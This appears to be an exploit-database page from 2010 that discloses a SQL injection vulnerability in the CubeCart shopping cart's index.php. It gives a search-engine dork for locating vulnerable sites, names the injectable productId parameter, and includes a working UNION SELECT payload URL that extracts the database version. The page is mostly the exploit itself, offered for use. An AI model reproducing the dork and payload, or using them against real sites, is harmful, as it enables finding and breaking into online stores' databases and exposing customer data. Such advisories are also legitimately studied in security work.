[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CubeCart (index.php) SQL Injection Vulnerability
# Published : 2010-02-18
# Author : AtT4CKxT3rR0r1ST
# Previous Title : Joomla Component com_otzivi Local File Inclusion Vulnerability
# Next Title : Open Source Classifieds v1.1.0 Alpha (OSClassi) Multiple Vulnerabilities
CubeCart (index.php) Sql Injection Vulnerability
==============================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : http://www.cubecart.com/downloads/
.:. Dork : "powered by CubeCart" inurl:"index.php?_a="
####################################################################
===[ Exploit ]===
www.site.com/index.php?_a=viewProd&productId=22[Sql Sql Injection]
===[ Example ]===
http://server/store/index.php?_a=viewProd&productId=22+and+1=2+union+select+version()
####################################################################